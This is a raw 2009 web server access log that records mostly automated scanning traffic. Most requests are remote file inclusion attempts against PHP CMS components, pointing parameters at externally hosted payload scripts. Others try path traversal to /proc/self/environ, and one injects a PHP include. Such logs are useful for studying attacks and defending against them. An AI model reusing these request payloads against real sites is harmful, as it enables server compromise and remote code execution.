211.49.99.7 - - [22/Jun/2009:04:13:59 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:13:59 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:13:59 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:04:14:04 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:04:14:04 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:04:14:07 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:04:14:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8EF2220036BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.31.50.73 - - [22/Jun/2009:04:14:22 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:04:16:21 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:04:16:27 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:04:16:27 -0400] "GET /modules/My_eGallery/index.php?basepath=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:04:16:27 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:04:16:28 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
217.147.29.190 - - [22/Jun/2009:04:16:57 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:04:17:22 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [22/Jun/2009:04:17:45 -0400] "GET /images/over-index19_pulseoxy.jpg HTTP/1.1" 200 2889 "-" "Googlebot-Image/1.0"
211.133.240.90 - - [22/Jun/2009:04:18:24 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:18:24 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:18:24 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:18:30 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:18:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.89.188.61 - - [22/Jun/2009:04:19:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
80.89.188.61 - - [22/Jun/2009:04:19:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
80.89.188.61 - - [22/Jun/2009:04:19:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.2)"
69.94.125.100 - - [22/Jun/2009:04:20:04 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:20:31 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.133.240.90 - - [22/Jun/2009:04:20:31 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
190.54.28.163 - - [22/Jun/2009:04:21:34 -0400] "GET /logs/access_log.Q109060200//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
190.54.28.163 - - [22/Jun/2009:04:21:34 -0400] "GET //modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
190.54.28.163 - - [22/Jun/2009:04:21:34 -0400] "GET /logs//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
190.54.28.163 - - [22/Jun/2009:04:21:39 -0400] "GET /logs/access_log.Q109060200/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 235 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [22/Jun/2009:04:21:39 -0400] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 208 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [22/Jun/2009:04:21:39 -0400] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 213 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [22/Jun/2009:04:21:46 -0400] "GET /logs/access_log.Q109060200//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 282 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:21:46 -0400] "GET //modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:21:46 -0400] "GET /logs//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:21:51 -0400] "GET /logs/access_log.Q109060200//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 282 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:21:51 -0400] "GET //modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:21:51 -0400] "GET /logs//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
211.133.240.90 - - [22/Jun/2009:04:22:24 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 251 "-" "libwww-perl/5.825"
211.133.240.90 - - [22/Jun/2009:04:22:24 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 246 "-" "libwww-perl/5.825"
211.133.240.90 - - [22/Jun/2009:04:22:24 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 273 "-" "libwww-perl/5.825"
74.6.17.151 - - [22/Jun/2009:04:22:27 -0400] "GET /logs/access_log.Q109042200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.133.240.90 - - [22/Jun/2009:04:22:28 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 273 "-" "libwww-perl/5.825"
74.53.70.114 - - [22/Jun/2009:04:22:59 -0400] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:22:59 -0400] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:22:59 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:23:04 -0400] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:23:04 -0400] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:23:04 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:04:23:31 -0400] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:04:23:31 -0400] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:04:23:31 -0400] "GET /logs/access_log.Q109053100//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:23:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.51.133.202 - - [22/Jun/2009:04:24:34 -0400] "GET /logs/error_log.Q109060500%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:25:42 -0400] "GET /logs/access_log.Q109053100//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:04:26:11 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:26:42 -0400] "GET /logs/access_log.Q109053100//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.145.133 - - [22/Jun/2009:04:27:08 -0400] "GET /logs/error_log.Q109060500%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:28:12 -0400] "GET /logs/error_log.Q109060500//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:28:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.145.133 - - [22/Jun/2009:04:28:49 -0400] "GET /logs/error_log.Q109060500//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:00 -0400] "GET //body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:01 -0400] "GET /logs/access_log.Q109051800//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:01 -0400] "GET /logs//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:02 -0400] "GET /logs//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:02 -0400] "GET //body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:03 -0400] "GET /logs/access_log.Q109051800%20%20//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:03 -0400] "GET //body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:03 -0400] "GET /logs//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:04:29:03 -0400] "GET /logs/access_log.Q109051800//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.30.100.97 - - [22/Jun/2009:04:31:42 -0400] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.30.100.97 - - [22/Jun/2009:04:31:45 -0400] "GET /logs/access_log.Q109053100//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.30.100.97 - - [22/Jun/2009:04:31:45 -0400] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:33:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [22/Jun/2009:04:33:51 -0400] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:04:33:51 -0400] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:04:33:51 -0400] "GET /logs/access_log.Q109060600%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:04:34:48 -0400] "GET /logs/access_log.Q109060200%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.54.28.163 - - [22/Jun/2009:04:36:02 -0400] "GET /logs/access_log.Q109061100//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 282 "-" "Advanced Browser (http://www.avantbrowser.com)"
190.54.28.163 - - [22/Jun/2009:04:36:07 -0400] "GET /logs/access_log.Q109061100/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
190.54.28.163 - - [22/Jun/2009:04:36:12 -0400] "GET /logs/access_log.Q109061100//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 282 "-" "XXXXXX"
190.54.28.163 - - [22/Jun/2009:04:36:18 -0400] "GET /logs/access_log.Q109061100//modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 282 "-" "XXXXXX"
74.53.70.114 - - [22/Jun/2009:04:36:28 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:36:28 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:36:28 -0400] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:36:35 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:04:37:06 -0400] "GET /images/Office%20Supply/cell_background.psd HTTP/1.0" 200 34766 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.88.179.68 - - [22/Jun/2009:04:37:37 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:37:37 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:37:38 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
74.53.70.114 - - [22/Jun/2009:04:37:50 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:37:50 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:37:50 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:38:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [22/Jun/2009:04:38:53 -0400] "GET //appserv/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:38:53 -0400] "GET /logs//appserv/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:38:54 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:38:56 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:39:03 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:39:20 -0400] "GET /logs/access_log.Q109060100%20%20//appserv/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.158.98.196 - - [22/Jun/2009:04:41:00 -0400] "GET //index.php?seite=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.49.99.7 - - [22/Jun/2009:04:42:01 -0400] "GET /index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:42:01 -0400] "GET /logs/access_log.Q109060400/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:04:42:02 -0400] "GET /logs/index.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:04:42:30 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:42:35 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:42:36 -0400] "GET /?sourcedir=http://www.egile.lt/images/al.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
212.88.179.68 - - [22/Jun/2009:04:42:36 -0400] "GET /logs/?sourcedir=http://www.egile.lt/images/al.txt?? HTTP/1.1" 200 6510 "-" "libwww-perl/5.805"
74.53.70.114 - - [22/Jun/2009:04:42:53 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:42:53 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:04:42:53 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:04:43:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [22/Jun/2009:04:44:00 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:04:44:35 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.egile.lt/images/al.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.6.17.151 - - [22/Jun/2009:04:44:39 -0400] "GET /logs/error_log.Q109051900 HTTP/1.0" 200 3979160 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [22/Jun/2009:04:44:39 -0400] "GET /logs/error_log.Q109051900 HTTP/1.0" 200 3979160 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.51.133.202 - - [22/Jun/2009:04:45:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:45:16 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:04:45:16 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
